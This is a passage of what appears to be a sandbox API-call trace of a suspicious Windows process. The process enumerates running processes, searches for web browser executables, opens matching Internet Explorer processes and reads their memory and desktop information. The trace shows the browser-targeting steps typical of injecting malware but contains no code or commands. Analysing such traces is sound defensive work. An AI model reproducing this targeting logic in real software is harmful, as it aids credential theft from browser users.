	[0205.338] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x2bec
	[0205.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.338] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0205.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.339] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.339] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0205.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.339] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.340] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0205.340] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x2bf0
	[0205.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.341] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0205.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.341] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0205.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.341] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0205.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.341] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.342] NtQueryInformationProcess (in: ProcessHandle=0x2bf0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0205.342] ReadProcessMemory (in: hProcess=0x2bf0, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0205.342] ReadProcessMemory (in: hProcess=0x2bf0, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0205.342] ReadProcessMemory (in: hProcess=0x2bf0, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0205.342] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0205.342] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0205.343] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x2bf4
	[0205.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.343] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0205.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.343] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0205.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.347] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0205.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.347] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.347] NtQueryInformationProcess (in: ProcessHandle=0x2bf4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0205.347] ReadProcessMemory (in: hProcess=0x2bf4, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0205.347] ReadProcessMemory (in: hProcess=0x2bf4, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0205.347] ReadProcessMemory (in: hProcess=0x2bf4, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0205.347] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0205.348] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0205.348] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x2bf8
	[0205.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.348] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0205.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.349] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.349] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0205.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.349] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.350] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0205.350] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x2bfc
	[0205.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.350] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0205.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.351] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.351] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0205.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.351] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.352] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.352] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x2c00
	[0205.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.352] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.353] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.353] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.353] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.354] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.354] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.355] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x2c04
	[0205.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.355] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.355] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.356] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.356] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.356] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0205.357] CloseHandle (hObject=0x188) returned 1
	[0205.357] Sleep (dwMilliseconds=0x64) 
	[0205.454] GetCurrentProcessId () returned 0x110
	[0205.454] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0205.457] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0205.459] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0205.460] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0205.461] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x2c08
	[0205.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.462] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0205.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.462] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.463] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0205.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.463] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.463] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0205.465] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x2c0c
	[0205.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.465] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0205.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.466] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.466] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0205.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.467] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.467] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0205.468] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x2c10
	[0205.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.469] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0205.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.469] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.470] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0205.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.470] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.470] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0205.471] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x2c14
	[0205.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.471] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0205.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.471] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.472] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0205.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.472] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.472] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0205.473] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x2c18
	[0205.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.473] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0205.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.473] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.474] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0205.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.474] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.474] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0205.475] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x2c1c
	[0205.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.475] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0205.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.475] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.476] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0205.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.476] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.476] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0205.477] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x2c20
	[0205.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.477] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0205.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.477] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.477] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0205.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.478] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.478] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0205.479] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x2c24
	[0205.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.479] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0205.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.479] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.479] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0205.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.479] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.480] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.480] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x2c28
	[0205.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.480] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.481] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.481] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.481] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.482] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.482] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x2c2c
	[0205.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.482] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.483] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.483] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.483] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.483] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.484] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x2c30
	[0205.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.484] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.485] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.485] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.485] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.486] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.486] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x2c34
	[0205.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.486] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.487] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.487] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.487] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.488] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.488] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x2c38
	[0205.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.488] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.489] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.489] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.489] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.489] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.490] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x2c3c
	[0205.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.490] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.491] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.491] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.491] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.491] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.492] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x2c40
	[0205.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.492] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.493] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.493] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.493] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
